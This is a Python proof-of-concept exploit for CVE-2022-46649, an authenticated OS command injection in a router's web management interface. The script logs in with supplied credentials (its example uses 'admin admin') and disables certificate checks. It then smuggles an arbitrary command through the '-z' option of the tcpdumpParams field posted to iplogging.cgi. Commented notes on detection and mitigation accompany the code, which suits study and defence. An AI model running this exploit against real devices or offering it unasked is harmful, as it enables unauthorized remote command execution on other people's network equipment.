POC / exploit.py PY
#!/usr/bin/env python3
# CVE-2022-46649
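# OS Command Injection via /cgi-bin/iplogging.cgi
# NOTE: the request built in exploit() below is sent to /admin/tools/iplogging.cgi,
# so that is the path to look for in web/access logs when checking for this PoC.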

import requests
import urllib3
import sys

# Every request in this script is sent with verify=False, i.e. the device's TLS
# certificate is never validated. This call only silences the warning urllib3
# would print for each such request; it does not change what is sent.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

def login(host, port, username, password):
    """Authenticate against the device's web interface and return the session.

    Posts an XML ``<connect>`` request (namespace ``urn:acemanager``) to
    ``/xml/Connect.xml`` over HTTPS. Any cookies the server sets stay on the
    returned ``requests.Session`` for later requests.

    The command-injection request needs this session, so the PoC only works
    with valid credentials; the usage text in this file shows ``admin admin``
    as its example pair.

    Args:
        host: Device address.
        port: HTTPS port of the management interface.
        username: Account name, interpolated into ``<login>`` verbatim.
        password: Password, placed inside a CDATA section verbatim.

    Returns:
        The ``requests.Session`` used for the login.

    Exits the process with status 1 when the login is rejected or the request
    raises.
    """
    # Neither credential is XML-escaped: a "<" or "&" in the username, or "]]>"
    # in the password, produces a malformed request.
    body = f"""
    <request xmlns="urn:acemanager">
        <connect>
            <login>{username}</login>
            <password><![CDATA[{password}]]></password>
        </connect>
    </request>
    """.strip()
    endpoint = f"https://{host}:{port}/xml/Connect.xml"
    http = requests.Session()
    content_type = {"Content-Type": "application/xml"}
    try:
        # verify=False: the server certificate is not checked.
        resp = http.post(endpoint, data=body, headers=content_type, verify=False, timeout=10)
        # Success is judged loosely: HTTP 200 plus the substring "OK" anywhere
        # in the response body.
        if resp.status_code != 200 or "OK" not in resp.text:
            print("[-] Login failed.")
            sys.exit(1)
        print("[+] Logged in successfully.")
        return http
    except Exception as err:
        # sys.exit() raises SystemExit, which is not an Exception subclass, so
        # the failed-login exit above is not swallowed here.
        print(f"[-] Connection error: {err}")
        sys.exit(1)

def exploit(host, port, session, injected_cmd):
    """Send the CVE-2022-46649 proof-of-concept request on a logged-in session.

    The request is a form-encoded POST to ``/admin/tools/iplogging.cgi`` with
    two fields: ``stateRequest=start`` and ``tcpdumpParams``. The latter is
    presumably handed to tcpdump on the device; this script fills it with
    fixed capture options followed by a ``-z`` option carrying the
    caller-supplied string.

    For defenders:
      * Detection: authenticated POSTs to ``iplogging.cgi`` whose
        ``tcpdumpParams`` value contains ``-z`` are the signature of this PoC.
      * Mitigation: apply the vendor's fix for the CVE and keep the management
        interface off untrusted networks. On the server side the parameter
        should be checked against an allow-list of capture options rather
        than forwarded as given.

    Args:
        host: Device address.
        port: HTTPS port of the management interface.
        session: Authenticated ``requests.Session`` (see ``login``).
        injected_cmd: String appended directly after ``-z``.

    Returns:
        None. The outcome is printed. HTTP 200 is the only thing checked, so
        the "sent successfully" message does not show that anything ran on
        the device.
    """
    target = f"https://{host}:{port}/admin/tools/iplogging.cgi"
    form_fields = dict(
        tcpdumpParams=f"-i eth0 -G 1 -z{injected_cmd}",
        stateRequest="start",
    )
    try:
        # verify=False: the server certificate is not checked.
        resp = session.post(target, data=form_fields, verify=False, timeout=10)
        if resp.status_code != 200:
            print(f"[-] Exploit failed. HTTP {resp.status_code}")
        else:
            print(f"[+] Payload sent successfully. Injected command: {injected_cmd}")
    except Exception as err:
        # Failures are reported but not fatal; the function just returns.
        print(f"[-] Exploit error: {err}")

if __name__ == "__main__":
    # Exactly five positional arguments are expected after the script name.
    # The password is one of them, so it is visible in shell history and the
    # process list of the machine running the script.
    cli_args = sys.argv[1:]
    if len(cli_args) != 5:
        for usage_line in (
            f"Usage: {sys.argv[0]} <host> <port> <username> <password> <command>",
            f"Example: {sys.argv[0]} 192.168.13.1 9443 admin admin reboot",
        ):
            print(usage_line)
        sys.exit(1)

    host, port, user, pwd, cmd = cli_args
    # login() exits the process on failure, so exploit() only runs with an
    # authenticated session.
    session = login(host, port, user, pwd)
    exploit(host, port, session, cmd)